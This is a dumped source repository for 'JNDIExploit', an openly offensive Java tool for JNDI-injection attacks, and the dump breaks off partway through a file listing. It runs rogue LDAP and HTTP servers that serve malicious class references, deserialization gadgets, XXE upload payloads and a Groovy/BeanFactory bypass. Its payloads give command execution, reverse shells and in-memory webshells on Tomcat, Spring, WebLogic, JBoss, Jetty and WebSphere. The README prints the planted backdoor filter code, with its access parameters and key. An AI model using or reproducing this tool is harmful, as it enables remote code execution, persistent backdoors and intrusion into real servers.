[
{
"path": ".gitignore",
"content": "/target/\n"
},
{
"path": ".idea/.gitignore",
"content": "# Default ignored files\n/workspace.xml"
},
{
"path": ".idea/compiler.xml",
"content": "\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n"
},
{
"path": ".idea/encodings.xml",
"content": "\n\n \n \n \n \n"
},
{
"path": ".idea/libraries/weblogic.xml",
"content": "\n \n \n \n \n \n \n \n"
},
{
"path": ".idea/libraries/webserviceclient.xml",
"content": "\n \n \n \n \n \n \n \n"
},
{
"path": ".idea/misc.xml",
"content": "\n\n \n \n \n \n \n \n \n \n \n \n \n"
},
{
"path": ".idea/uiDesigner.xml",
"content": "\n\n \n \n - \n \n
\n - \n \n
\n - \n \n
\n - \n \n
\n - \n \n \n \n \n
\n - \n \n \n \n \n
\n - \n \n \n \n \n
\n - \n \n \n \n \n
\n - \n \n \n \n
\n - \n \n \n \n
\n - \n \n \n \n
\n - \n \n \n \n
\n - \n \n \n \n
\n - \n \n \n \n
\n - \n \n
\n - \n \n \n \n
\n - \n \n \n \n
\n - \n \n \n \n
\n - \n \n \n \n
\n - \n \n \n \n
\n - \n \n
\n - \n \n
\n - \n \n
\n - \n \n
\n - \n \n \n \n
\n - \n \n
\n - \n \n
\n \n \n"
},
{
"path": ".idea/vcs.xml",
"content": "\n\n \n \n \n"
},
{
"path": "JNDIExploit.iml",
"content": "\n"
},
{
"path": "README.md",
"content": "# JNDIExploit\n一款用于 ```JNDI注入``` 利用的工具,大量参考/引用了 ```Rogue JNDI``` 项目的代码,支持直接```植入内存shell```,并集成了常见的```bypass 高版本JDK```的方式,适用于与自动化工具配合使用。\n\n## 使用说明\n\n使用 ```java -jar JNDIExploit.jar -h``` 查看参数说明,其中 ```--ip``` 参数为必选参数\n\n```\nUsage: java -jar JNDIExploit.jar [options]\n Options:\n * -i, --ip Local ip address\n -l, --ldapPort Ldap bind port (default: 1389)\n -p, --httpPort Http bind port (default: 8080)\n -u, --usage Show usage (default: false)\n -h, --help Show this help\n```\n\n使用 ```java -jar JNDIExploit.jar -u``` 查看支持的 LDAP 格式\n```\nSupported LADP Queries\n* all words are case INSENSITIVE when send to ldap server\n\n[+] Basic Queries: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params], e.g.\n ldap://127.0.0.1:1389/Basic/Dnslog/[domain]\n ldap://127.0.0.1:1389/Basic/Command/[cmd]\n ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]\n ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port] ---windows NOT supported\n ldap://127.0.0.1:1389/Basic/TomcatMemshell\n ldap://127.0.0.1:1389/Basic/JettyMemshell\n ldap://127.0.0.1:1389/Basic/WeblogicMemshell\n ldap://127.0.0.1:1389/Basic/JBossMemshell\n ldap://127.0.0.1:1389/Basic/WebsphereMemshell\n ldap://127.0.0.1:1389/Basic/SpringMemshell\n\n[+] Deserialize Queries: ldap://127.0.0.1:1389/Deserialize/[GadgetType]/[PayloadType]/[Params], e.g.\n ldap://127.0.0.1:1389/Deserialize/URLDNS/[domain]\n ldap://127.0.0.1:1389/Deserialize/CommonsCollections1/Dnslog/[domain]\n ldap://127.0.0.1:1389/Deserialize/CommonsCollections2/Command/[cmd]\n ldap://127.0.0.1:1389/Deserialize/CommonsBeanutils1/Command/Base64/[base64_encoded_cmd]\n ldap://127.0.0.1:1389/Deserialize/C3P0/ReverseShell/[ip]/[port] ---windows NOT supported\n ldap://127.0.0.1:1389/Deserialize/Jre8u20/TomcatMemshell ---ALSO support other memshells\n\n[+] TomcatBypass Queries\n ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[domain]\n ldap://127.0.0.1:1389/TomcatBypass/Command/[cmd]\n ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]\n ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port] ---windows NOT supported\n ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell\n ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell\n\n[+] GroovyBypass Queries\n ldap://127.0.0.1:1389/GroovyBypass/Command/[cmd]\n ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd]\n\n[+] WebsphereBypass Queries\n ldap://127.0.0.1:1389/WebsphereBypass/List/file=[file or directory]\n ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[domain]\n ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/[cmd]\n ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]\n ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port] ---windows NOT supported\n ldap://127.0.0.1:1389/WebsphereBypass/Upload/WebsphereMemshell\n ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path] ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp\n```\n* 目前支持的所有 ```PayloadType``` 为\n * ```Dnslog```: 用于产生一个```DNS```请求,与 ```DNSLog```平台配合使用,对```Linux/Windows```进行了简单的适配\n * ```Command```: 用于执行命令,如果命令有特殊字符,支持对命令进行 ```Base64编码```后传输\n * ```ReverseShell```: 用于 ```Linux``` 系统的反弹shell,方便使用\n * ```TomcatMemshell```: 用于植入```Tomcat内存shell```, 支持```Behinder shell``` 与 ```Basic cmd shell```\n * ```SpringMemshell```: 用于植入```Spring内存shell```, 支持```Behinder shell``` 与 ```Basic cmd shell```\n * ```WeblogicMemshell```: 用于植入```Weblogic内存shell```, 支持```Behinder shell``` 与 ```Basic cmd shell```\n * ```JettyMemshell```: 用于植入```Jetty内存shell```, 支持```Behinder shell``` 与 ```Basic cmd shell```\n * ```JBossMemshell```: 用于植入```JBoss内存shell```, 支持```Behinder shell``` 与 ```Basic cmd shell```\n * ```WebsphereMemshell```: 用于植入```Websphere内存shell```, 支持```Behinder shell``` 与 ```Basic cmd shell```\n* 目前支持的所有 ```GadgetType``` 为\n * ```URLDNS```\n * ```CommonsBeanutis1```\n * ```CommonsCollections1```\n * ```CommonsCollections2```\n * ```C3P0```\n * ```Jre8u20```\n* ```WebsphereBypass``` 中的 3 个动作:\n * ```list```:基于```XXE```查看目标服务器上的目录或文件内容\n * ```upload```:基于```XXE```的```jar协议```将恶意```jar包```上传至目标服务器的临时目录\n * ```rce```:加载已上传至目标服务器临时目录的```jar包```,从而达到远程代码执行的效果(这一步本地未复现成功,抛```java.lang.IllegalStateException: For application client runtime, the client factory execute on a managed server thread is not allowed.```异常,有复现成功的小伙伴麻烦指导下)\n\n## ```内存shell```说明\n* 采用动态添加 ```Filter/Controller```的方式,并将添加的```Filter```移动至```FilterChain```的第一位\n* ```内存shell``` 的兼容性测试结果请参考 [memshell](https://github.com/feihong-cs/memShell) 项目\n* ```Basic cmd shell``` 的访问方式为 ```/anything?type=basic&pass=[cmd]```\n* ```Behinder shell``` 的访问方式需要修改```冰蝎```客户端(请参考 [冰蝎改造之适配基于tomcat Filter的无文件webshell](https://mp.weixin.qq.com/s/n1wrjep4FVtBkOxLouAYfQ) 的方式二自行修改),并在访问时需要添加 ```X-Options-Ai``` 头部,密码为```rebeyond```\n\n植入的 Filter 代码如下:\n```\npublic void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {\n System.out.println(\"[+] Dynamic Filter says hello\");\n String k;\n Cipher cipher;\n if (servletRequest.getParameter(\"type\") != null && servletRequest.getParameter(\"type\").equals(\"basic\")) {\n k = servletRequest.getParameter(\"pass\");\n if (k != null && !k.isEmpty()) {\n cipher = null;\n String[] cmds;\n if (File.separator.equals(\"/\")) {\n cmds = new String[]{\"/bin/sh\", \"-c\", k};\n } else {\n cmds = new String[]{\"cmd\", \"/C\", k};\n }\n\n String result = (new Scanner(Runtime.getRuntime().exec(cmds).getInputStream())).useDelimiter(\"\\\\A\").next();\n servletResponse.getWriter().println(result);\n }\n } else if (((HttpServletRequest)servletRequest).getHeader(\"X-Options-Ai\") != null) {\n try {\n if (((HttpServletRequest)servletRequest).getMethod().equals(\"POST\")) {\n k = \"e45e329feb5d925b\";\n ((HttpServletRequest)servletRequest).getSession().setAttribute(\"u\", k);\n cipher = Cipher.getInstance(\"AES\");\n cipher.init(2, new SecretKeySpec((((HttpServletRequest)servletRequest).getSession().getAttribute(\"u\") + \"\").getBytes(), \"AES\"));\n byte[] evilClassBytes = cipher.doFinal((new BASE64Decoder()).decodeBuffer(servletRequest.getReader().readLine()));\n Class evilClass = (Class)this.myClassLoaderClazz.getDeclaredMethod(\"defineClass\", byte[].class, ClassLoader.class).invoke((Object)null, evilClassBytes, Thread.currentThread().getContextClassLoader());\n Object evilObject = evilClass.newInstance();\n Method targetMethod = evilClass.getDeclaredMethod(\"equals\", ServletRequest.class, ServletResponse.class);\n targetMethod.invoke(evilObject, servletRequest, servletResponse);\n }\n } catch (Exception var10) {\n var10.printStackTrace();\n }\n } else {\n filterChain.doFilter(servletRequest, servletResponse);\n }\n\n }\n ```\n \n ## 参考\n * https://github.com/veracode-research/rogue-jndi\n * https://github.com/welk1n/JNDI-Injection-Exploit\n * https://github.com/welk1n/JNDI-Injection-Bypass\n"
},
{
"path": "pom.xml",
"content": "\n\n 4.0.0\n\n org.example\n JNDIExploit\n 1.0-SNAPSHOT\n \n \n \n org.apache.maven.plugins\n maven-compiler-plugin\n 3.8.0\n \n 6\n 6\n \n ${project.basedir}/lib\n \n \n \n \n maven-assembly-plugin\n \n false\n \n jar-with-dependencies\n \n \n \n com.feihong.ldap.Starter\n \n \n \n \n \n make-assembly\n package\n \n assembly\n \n \n \n \n \n \n\n \n true\n UTF-8\n 1.6\n 1.6\n \n 3.2.3.RELEASE\n \n \n \n \n \n\n \n \n org.springframework\n spring-core\n ${spring.version}\n \n \n org.springframework\n spring-beans\n ${spring.version}\n \n \n org.springframework\n spring-web\n ${spring.version}\n \n \n org.springframework\n spring-oxm\n ${spring.version}\n \n \n org.springframework\n spring-tx\n ${spring.version}\n \n \n org.springframework\n spring-jdbc\n ${spring.version}\n \n \n org.springframework\n spring-webmvc\n ${spring.version}\n \n \n org.springframework\n spring-aop\n ${spring.version}\n \n \n org.springframework\n spring-context-support\n ${spring.version}\n \n \n org.springframework\n spring-test\n ${spring.version}\n \n \n junit\n junit\n 4.11\n test\n \n \n \n javax.servlet\n javax.servlet-api\n 4.0.1\n \n \n \n com.mchange\n c3p0\n 0.9.5.5\n \n \n \n commons-beanutils\n commons-beanutils\n 1.9.2\n \n \n \n commons-collections\n commons-collections\n 3.1\n \n \n \n org.apache.commons\n commons-collections4\n 4.0\n \n \n \n org.apache.tomcat.embed\n tomcat-embed-core\n 8.5.58\n \n \n org.ow2.asm\n asm\n 8.0.1\n \n \n com.unboundid\n unboundid-ldapsdk\n 4.0.9\n \n \n com.nqzero\n permit-reflect\n 0.3\n \n \n \n net.jodah\n expiringmap\n 0.5.9\n \n \n org.reflections\n reflections\n 0.9.10\n \n \n \n io.undertow\n undertow-core\n 2.2.2.Final\n \n \n \n io.undertow\n undertow-servlet\n 2.2.2.Final\n \n \n \n org.jboss.spec.javax.security.jacc\n jboss-jacc-api_1.4_spec\n 1.0.3.Final\n \n \n \n com.beust\n jcommander\n 1.78\n \n \n org.codehaus.groovy\n groovy\n 2.4.5\n \n \n org.apache.commons\n commons-text\n 1.8\n \n \n"
},
{
"path": "src/main/java/com/feihong/ldap/HTTPServer.java",
"content": "package com.feihong.ldap;\n\nimport com.feihong.ldap.template.CommandTemplate;\nimport com.feihong.ldap.template.DnslogTemplate;\nimport com.feihong.ldap.template.ReverseShellTemplate;\nimport com.feihong.ldap.utils.Cache;\nimport com.feihong.ldap.utils.Config;\nimport com.feihong.ldap.utils.Util;\nimport com.sun.net.httpserver.HttpExchange;\nimport com.sun.net.httpserver.HttpHandler;\nimport com.sun.net.httpserver.HttpServer;\nimport javassist.ClassPool;\nimport javassist.CtClass;\nimport org.apache.commons.lang3.reflect.FieldUtils;\nimport java.io.ByteArrayOutputStream;\nimport java.io.IOException;\nimport java.net.InetSocketAddress;\nimport java.util.*;\nimport java.util.jar.JarOutputStream;\nimport java.util.zip.ZipEntry;\n\npublic class HTTPServer {\n\n public static void start() throws IOException {\n\n HttpServer httpServer = HttpServer.create(new InetSocketAddress(Config.httpPort), 0);\n httpServer.createContext(\"/\", new HttpHandler() {\n public void handle(HttpExchange httpExchange){\n try {\n System.out.println(\"[+] New HTTP Request From \" + httpExchange.getRemoteAddress() + \" \" + httpExchange.getRequestURI());\n\n String path = httpExchange.getRequestURI().getPath();\n if(path.endsWith(\".class\")){\n handleClassRequest(httpExchange);\n }else if(path.endsWith(\".wsdl\")){\n handleWSDLRequest(httpExchange);\n }else if(path.endsWith(\".jar\")){\n handleJarRequest(httpExchange);\n }else if(path.startsWith(\"/xxelog\")){\n handleXXELogRequest(httpExchange);\n }else{\n httpExchange.sendResponseHeaders(404, 0);\n httpExchange.close();\n System.out.println(\"[!] Response Code: \" + 404);\n }\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n });\n\n httpServer.setExecutor(null);\n httpServer.start();\n System.out.println(\"[+] HTTP Server Start Listening on \" + Config.httpPort + \"...\");\n }\n\n public static void handleXXELogRequest(HttpExchange exchange) throws IllegalAccessException, IOException {\n Object exchangeImpl = FieldUtils.readField(exchange, \"impl\", true);\n Object request = FieldUtils.readField(exchangeImpl, \"req\", true);\n String startLine = (String) FieldUtils.readField(request, \"startLine\", true);\n\n// System.out.println(\"[\\u001B[31]mxxe attack result: \" + startLine + \"\\u001B[0m\");\n System.out.println(\"[+] XXE Attack Result: \" + startLine);\n exchange.sendResponseHeaders(200, 0);\n exchange.close();\n }\n\n private static void handleJarRequest(HttpExchange exchange) throws IOException{\n String path = exchange.getRequestURI().getPath();\n String jarName = path.substring(path.lastIndexOf(\"/\") + 1, path.lastIndexOf(\".\"));\n\n if(Cache.contains(jarName)){\n System.out.println(\"[+] Response Code: \" + 200);\n\n byte[] bytes = Cache.get(jarName);\n exchange.sendResponseHeaders(200, bytes.length + 1);\n exchange.getResponseBody().write(bytes);\n System.out.println(\"[+] Stalling connection for 60 seconds\");\n try{\n Thread.sleep(60000);\n }catch (InterruptedException e){\n e.printStackTrace();\n }\n System.out.println(\"[+] Release stalling...\");\n }else{\n System.out.println(\"[!] Response Code: \" + 404);\n exchange.sendResponseHeaders(404, 0);\n }\n exchange.close();\n }\n\n private static void handleClassRequest(HttpExchange exchange) throws IOException{\n String path = exchange.getRequestURI().getPath();\n String className = path.substring(path.lastIndexOf(\"/\") + 1, path.lastIndexOf(\".\"));\n System.out.println(\"[+] Receive ClassRequest: \" + className + \".class\");\n\n if(Cache.contains(className)){\n System.out.println(\"[+] Response Code: \" + 200);\n\n byte[] bytes = Cache.get(className);\n exchange.sendResponseHeaders(200, bytes.length);\n exchange.getResponseBody().write(bytes);\n }else{\n System.out.println(\"[!] Response Code: \" + 404);\n exchange.sendResponseHeaders(404, 0);\n }\n exchange.close();\n }\n\n private static void handleWSDLRequest(HttpExchange exchange) throws Exception {\n String query = exchange.getRequestURI().getQuery();\n Map params = parseQuery(query);\n\n String path = exchange.getRequestURI().getPath().substring(1);\n\n if(path.startsWith(\"list\")) {\n //intended to list directories or read files on server\n String file = params.get(\"file\");\n if (file != null && !file.isEmpty()) {\n String listWsdl = \"\" +\n \"\\n\" +\n \" \\n\" +\n \" %bbb;\\n\" +\n \"]>\\n\" +\n \"\\n\" +\n \" &ddd;\\n\" +\n \"\";\n\n System.out.println(\"[+] Response Code: \" + 200);\n exchange.sendResponseHeaders(200, listWsdl.getBytes().length);\n exchange.getResponseBody().write(listWsdl.getBytes());\n } else {\n System.out.println(\"[!] Missing or wrong argument\");\n System.out.println(\"[!] Response Code: \" + 404);\n exchange.sendResponseHeaders(404, 0);\n }\n exchange.close();\n\n }else if(path.startsWith(\"upload\")) {\n String type = params.get(\"type\");\n\n String[] args = null;\n if (type.equalsIgnoreCase(\"command\")) {\n args = new String[]{params.get(\"cmd\")};\n } else if (type.equalsIgnoreCase(\"dnslog\")) {\n args = new String[]{params.get(\"url\")};\n } else if (type.equalsIgnoreCase(\"reverseshell\")) {\n args = new String[]{params.get(\"ip\"), params.get(\"port\")};\n }\n\n String jarName = createJar(type, args);\n if (jarName != null) {\n String uploadWsdl = \"\";\n\n System.out.println(\"[+] Response Code: \" + 200);\n exchange.sendResponseHeaders(200, uploadWsdl.getBytes().length);\n exchange.getResponseBody().write(uploadWsdl.getBytes());\n } else {\n System.out.println(\"[!] Missing or wrong argument\");\n System.out.println(\"[!] Response Code: \" + 404);\n exchange.sendResponseHeaders(404, 0);\n }\n exchange.close();\n }else if(path.startsWith(\"http\")) {\n String xxhttp = \"'>'>%ccc;\";\n System.out.println(\"[+] Response Code: \" + 200);\n exchange.sendResponseHeaders(200, xxhttp.getBytes().length);\n exchange.getResponseBody().write(xxhttp.getBytes());\n exchange.close();\n }else{\n System.out.println(\"[!] Response Code: \" + 404);\n exchange.sendResponseHeaders(404, 0);\n exchange.close();\n }\n }\n\n private static Map parseQuery(String query){\n Map params = new HashMap();\n\n try{\n for(String str : query.split(\"&\")){\n try{\n String[] parts = str.split(\"=\",2);\n params.put(parts[0], parts[1]);\n }catch(Exception e){\n //continue\n }\n }\n }catch(Exception e){\n //continue\n }\n\n return params;\n }\n\n /*\n 由于我本地安装的 Websphere 在加载本地 classpath 这一步复现不成功\n 这里不确定 websphere 这种方式在多次操作时 Class 文件名相同时是否会存在问题\n 目前暂时认为其不会有问题,如果有问题,后面再修改\n */\n private static String createJar(String type, String... params) throws Exception {\n byte[] bytes = new byte[0];\n String className = \"xExportObject\";\n\n if (type.toLowerCase().equals(\"command\")) {\n CommandTemplate commandTemplate = new CommandTemplate(params[0], \"xExportObject\");\n bytes = commandTemplate.getBytes();\n } else if (type.toLowerCase().equals(\"dnslog\")){\n DnslogTemplate dnslogTemplate = new DnslogTemplate(params[0], \"xExportObject\");\n bytes = dnslogTemplate.getBytes();\n } else if (type.toLowerCase().equals(\"reverseshell\")) {\n ReverseShellTemplate reverseShellTemplate = new ReverseShellTemplate(params[0], params[1], \"xExportObject\");\n bytes = reverseShellTemplate.getBytes();\n } else if (type.toLowerCase().equals(\"webspherememshell\")) {\n ClassPool classPool = ClassPool.getDefault();\n CtClass exploitClass = classPool.get(\"com.feihong.ldap.template.WebsphereMemshellTemplate\");\n exploitClass.setName(className);\n exploitClass.detach();\n bytes = exploitClass.toBytecode();\n }else{\n return null;\n }\n\n System.out.println(\"[+] Name of Class in Jar: \" + className);\n ByteArrayOutputStream bout = new ByteArrayOutputStream();\n JarOutputStream jarOut = new JarOutputStream(bout);\n jarOut.putNextEntry(new ZipEntry(className + \".class\"));\n jarOut.write(bytes);\n jarOut.closeEntry();\n jarOut.close();\n bout.close();\n\n String jarName = Util.getRandomString();\n Cache.set(jarName, bout.toByteArray());\n\n return jarName;\n }\n}\n"
},
{
"path": "src/main/java/com/feihong/ldap/LdapServer.java",
"content": "package com.feihong.ldap;\n\nimport com.feihong.ldap.controllers.LdapController;\nimport com.feihong.ldap.controllers.LdapMapping;\nimport com.feihong.ldap.utils.Config;\nimport com.unboundid.ldap.listener.InMemoryDirectoryServer;\nimport com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;\nimport com.unboundid.ldap.listener.InMemoryListenerConfig;\nimport com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;\nimport com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;\nimport org.reflections.Reflections;\nimport javax.net.ServerSocketFactory;\nimport javax.net.SocketFactory;\nimport javax.net.ssl.SSLSocketFactory;\nimport java.lang.reflect.Constructor;\nimport java.net.InetAddress;\nimport java.util.Set;\nimport java.util.TreeMap;\n\n\npublic class LdapServer extends InMemoryOperationInterceptor {\n\n TreeMap routes = new TreeMap();\n\n public static void start() {\n try {\n InMemoryDirectoryServerConfig serverConfig = new InMemoryDirectoryServerConfig(\"dc=example,dc=com\");\n serverConfig.setListenerConfigs(new InMemoryListenerConfig(\n \"listen\",\n InetAddress.getByName(\"0.0.0.0\"),\n Config.ldapPort,\n ServerSocketFactory.getDefault(),\n SocketFactory.getDefault(),\n (SSLSocketFactory) SSLSocketFactory.getDefault()));\n\n serverConfig.addInMemoryOperationInterceptor(new LdapServer());\n InMemoryDirectoryServer ds = new InMemoryDirectoryServer(serverConfig);\n ds.startListening();\n System.out.println(\"[+] LDAP Server Start Listening on \" + Config.ldapPort + \"...\");\n }\n catch ( Exception e ) {\n e.printStackTrace();\n }\n }\n\n public LdapServer() throws Exception {\n\n //find all classes annotated with @LdapMapping\n Set> controllers = new Reflections(this.getClass().getPackage().getName())\n .getTypesAnnotatedWith(LdapMapping.class);\n\n //instantiate them and store in the routes map\n for(Class controller : controllers) {\n Constructor cons = controller.getConstructor();\n LdapController instance = (LdapController) cons.newInstance();\n String[] mappings = controller.getAnnotation(LdapMapping.class).uri();\n for(String mapping : mappings) {\n if(mapping.startsWith(\"/\"))\n mapping = mapping.substring(1); //remove first forward slash\n\n routes.put(mapping, instance);\n }\n }\n }\n\n /**\n * {@inheritDoc}\n *\n * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult)\n */\n @Override\n public void processSearchResult(InMemoryInterceptedSearchResult result) {\n String base = result.getRequest().getBaseDN();\n System.out.println(\"[+] Received LDAP Query: \" + base);\n LdapController controller = null;\n //find controller\n for(String key: routes.keySet()) {\n //compare using wildcard at the end\n if(base.toLowerCase().startsWith(key)) {\n controller = routes.get(key);\n break;\n }\n }\n\n if(controller == null){\n System.out.println(\"[!] Invalid LDAP Query: \" + base);\n return;\n }\n\n try {\n controller.process(base);\n controller.sendResult(result, base);\n } catch (Exception e1) {\n System.out.println(\"[!] Exception: \" + e1.getMessage());\n }\n }\n}"
},
{
"path": "src/main/java/com/feihong/ldap/Starter.java",
"content": "package com.feihong.ldap;\n\nimport com.feihong.ldap.utils.Config;\nimport java.io.IOException;\n\npublic class Starter {\n public static void main(String[] args) throws IOException {\n Config.applyCmdArgs(args);\n LdapServer.start();\n HTTPServer.start();\n }\n}\n"
},
{
"path": "src/main/java/com/feihong/ldap/controllers/BasicController.java",
"content": "package com.feihong.ldap.controllers;\n\nimport com.feihong.ldap.enumtypes.MemShellType;\nimport com.feihong.ldap.enumtypes.PayloadType;\nimport com.feihong.ldap.exceptions.IncorrectParamsException;\nimport com.feihong.ldap.exceptions.UnSupportedPayloadTypeException;\nimport com.feihong.ldap.utils.*;\nimport com.feihong.ldap.template.CommandTemplate;\nimport com.feihong.ldap.template.DnslogTemplate;\nimport com.feihong.ldap.template.ReverseShellTemplate;\nimport com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;\nimport com.unboundid.ldap.sdk.Entry;\nimport com.unboundid.ldap.sdk.LDAPResult;\nimport com.unboundid.ldap.sdk.ResultCode;\nimport java.net.URL;\n\n@LdapMapping(uri = { \"/basic\" })\npublic class BasicController implements LdapController {\n //最后的反斜杠不能少\n private String codebase = Config.codeBase;\n private PayloadType type;\n private String[] params;\n\n @Override\n public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {\n System.out.println(\"[+] Sending LDAP ResourceRef result for \" + base + \" with basic remote reference payload\");\n //这个方法里面有改动,其他基本无改动\n Entry e = new Entry(base);\n String className = \"\";\n\n switch (type){\n case dnslog:\n DnslogTemplate dnslogTemplate = new DnslogTemplate(params[0]);\n dnslogTemplate.cache();\n className = dnslogTemplate.getClassName();\n break;\n case command:\n CommandTemplate commandTemplate = new CommandTemplate(params[0]);\n commandTemplate.cache();\n className = commandTemplate.getClassName();\n break;\n case reverseshell:\n ReverseShellTemplate reverseShellTemplate = new ReverseShellTemplate(params[0], params[1]);\n reverseShellTemplate.cache();\n className = reverseShellTemplate.getClassName();\n break;\n case tomcatmemshell:\n className = MemShellType.TOMCAT;\n break;\n case jettymemshell:\n className = MemShellType.JETTY;\n break;\n case jbossmemshell:\n className = MemShellType.JBOSS;\n break;\n case weblogicmemshell:\n className = MemShellType.WEBLOGIC;\n break;\n case webspherememshell:\n className = MemShellType.WEBSPHERE;\n break;\n case springmemshell:\n className = MemShellType.SPRING;\n break;\n }\n\n URL turl = new URL(new URL(this.codebase), className + \".class\");\n System.out.println(\"[+] Send LDAP reference result for \" + base + \" redirecting to \" + turl);\n e.addAttribute(\"javaClassName\", \"foo\");\n e.addAttribute(\"javaCodeBase\", this.codebase);\n e.addAttribute(\"objectClass\", \"javaNamingReference\"); //$NON-NLS-1$\n e.addAttribute(\"javaFactory\", className);\n result.sendSearchEntry(e);\n result.setResult(new LDAPResult(0, ResultCode.SUCCESS));\n }\n\n @Override\n public void process(String base) throws UnSupportedPayloadTypeException, IncorrectParamsException {\n try{\n int fistIndex = base.indexOf(\"/\");\n int secondIndex = base.indexOf(\"/\", fistIndex + 1);\n if(secondIndex < 0) secondIndex = base.length();\n\n try{\n type = PayloadType.valueOf(base.substring(fistIndex + 1, secondIndex).toLowerCase());\n System.out.println(\"[+] Paylaod: \" + type);\n }catch(IllegalArgumentException e){\n throw new UnSupportedPayloadTypeException(\"UnSupportedPayloadType: \" + base.substring(fistIndex + 1, secondIndex));\n }\n\n switch(type){\n case dnslog:\n String url = base.substring(base.lastIndexOf(\"/\") + 1);\n System.out.println(\"[+] URL: \" + url);\n params = new String[]{url};\n break;\n case command:\n String cmd = Util.getCmdFromBase(base);\n System.out.println(\"[+] Command: \" + cmd);\n params = new String[]{cmd};\n break;\n case reverseshell:\n String[] results = Util.getIPAndPortFromBase(base);\n System.out.println(\"[+] IP: \" + results[0]);\n System.out.println(\"[+] Port: \" + results[1]);\n params = results;\n break;\n }\n }catch(Exception e){\n if(e instanceof UnSupportedPayloadTypeException) throw (UnSupportedPayloadTypeException)e;\n\n throw new IncorrectParamsException(\"Incorrect params: \" + base);\n }\n }\n}\n"
},
{
"path": "src/main/java/com/feihong/ldap/controllers/GroovyBypassController.java",
"content": "package com.feihong.ldap.controllers;\n\nimport com.feihong.ldap.enumtypes.PayloadType;\nimport com.feihong.ldap.exceptions.IncorrectParamsException;\nimport com.feihong.ldap.exceptions.UnSupportedPayloadTypeException;\nimport com.feihong.ldap.utils.*;\nimport com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;\nimport com.unboundid.ldap.sdk.Entry;\nimport com.unboundid.ldap.sdk.LDAPResult;\nimport com.unboundid.ldap.sdk.ResultCode;\nimport org.apache.naming.ResourceRef;\nimport javax.naming.StringRefAddr;\n\n/*\n * Requires:\n * - Tomcat and Groovy in classpath\n *\n * @author https://twitter.com/orange_8361 and https://github.com/welk1n\n *\n * Groovy 语法参考:\n * - https://xz.aliyun.com/t/8231#toc-7\n * - https://my.oschina.net/jjyuangu/blog/1815945\n * - https://stackoverflow.com/questions/4689240/detecting-the-platform-window-or-linux-by-groovy-grails\n */\n\n@LdapMapping(uri = { \"/groovybypass\" })\npublic class GroovyBypassController implements LdapController {\n private PayloadType type;\n private String[] params;\n private String template = \" if (System.properties['os.name'].toLowerCase().contains('windows')) {\\n\" +\n \" ['cmd','/C', '${cmd}'].execute();\\n\" +\n \" } else {\\n\" +\n \" ['/bin/sh','-c', '${cmd}'].execute();\\n\" +\n \" }\";\n\n @Override\n public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {\n System.out.println(\"[+] Sending LDAP ResourceRef result for \" + base + \" with groovy.lang.GroovyShell payload\");\n\n Entry e = new Entry(base);\n e.addAttribute(\"javaClassName\", \"java.lang.String\"); //could be any\n\n //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory\n ResourceRef ref = new ResourceRef(\"groovy.lang.GroovyShell\", null, \"\", \"\", true,\"org.apache.naming.factory.BeanFactory\",null);\n ref.add(new StringRefAddr(\"forceString\", \"x=evaluate\"));\n System.out.println(\"[+] Returen script: \");\n System.out.println(\"-----------------------------------------------\");\n System.out.println(template.replace(\"${cmd}\", params[0]).replace(\"${cmd}\", params[0]));\n System.out.println(\"-----------------------------------------------\");\n ref.add(new StringRefAddr(\"x\", template.replace(\"${cmd}\", params[0]).replace(\"${cmd}\", params[0])));\n\n e.addAttribute(\"javaSerializedData\", Util.serialize(ref));\n\n result.sendSearchEntry(e);\n result.setResult(new LDAPResult(0, ResultCode.SUCCESS));\n }\n\n @Override\n public void process(String base) throws UnSupportedPayloadTypeException, IncorrectParamsException {\n try{\n int firstIndex = base.indexOf(\"/\");\n int secondIndex = base.indexOf(\"/\", firstIndex + 1);\n if(secondIndex < 0) secondIndex = base.length();\n\n //因为我对 grovvy 的语法完全不懂,所以目前只支持执行命令这一种形式的 PayloadType\n String payloadType = base.substring(firstIndex + 1, secondIndex);\n if(payloadType.equalsIgnoreCase(\"command\")){\n type = PayloadType.valueOf(\"command\");\n System.out.println(\"[+] Paylaod: \" + type);\n }else{\n throw new UnSupportedPayloadTypeException(\"UnSupportedPayloadType: \" + payloadType);\n }\n\n String cmd = Util.getCmdFromBase(base);\n System.out.println(\"[+] Command: \" + cmd);\n params = new String[]{cmd};\n }catch(Exception e){\n if(e instanceof UnSupportedPayloadTypeException) throw (UnSupportedPayloadTypeException)e;\n\n throw new IncorrectParamsException(\"Incorrect params: \" + base);\n }\n }\n}"
},
{
"path": "src/main/java/com/feihong/ldap/controllers/LdapController.java",
